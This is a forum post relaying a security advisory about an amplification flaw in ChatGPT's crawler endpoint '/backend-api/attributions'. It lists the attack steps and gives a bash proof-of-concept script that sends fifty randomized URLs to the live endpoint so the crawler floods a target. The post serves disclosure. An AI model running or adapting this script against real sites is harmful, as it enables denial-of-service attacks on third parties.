01-21-2025, 04:29 PM
(This post was last modified: 01-21-2025, 04:36 PM by agent_peanut.)
https://github.com/bf/security-advisorie...ability.md
So it looks like ChatGPT's crawler allows sending multiple requests to target using endpoint `/backend-api/attributions` due to a lack of deduplication and URL limiting in the API.
Attack method:
OpenAI has not responded, meaning they're scrambling this in the background somehow, if it makes any sense to them
So it looks like ChatGPT's crawler allows sending multiple requests to target using endpoint `/backend-api/attributions` due to a lack of deduplication and URL limiting in the API.
Attack method:
- Attacker sends one request to ChatGPT's API with many duplicate URLs
- ChatGPT crawler automatically initiates parallel requests to the target
- Creates amplification effect where one attack request generates many crawler requests
- Crawler requests come from legitimate Microsoft Azure IP ranges
OpenAI has not responded, meaning they're scrambling this in the background somehow, if it makes any sense to them

#!/bin/bash
# Part 1: Generate sequence and URLs
echo {1..50} | tr ' ' '\n' | (
while read -r i;
do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
done
) |
# Part 2: Convert to JSON payload
jq -R -s -j -c '{ "urls": split("\n")[:-1] }' |
# Part 3: Send HTTP request
curl -v --http1.1 \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
-H "content-type: application/json" \
-H 'origin: https://www.chatgpt.com' \
--data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'
Mr. Benedict Ivan Goodhello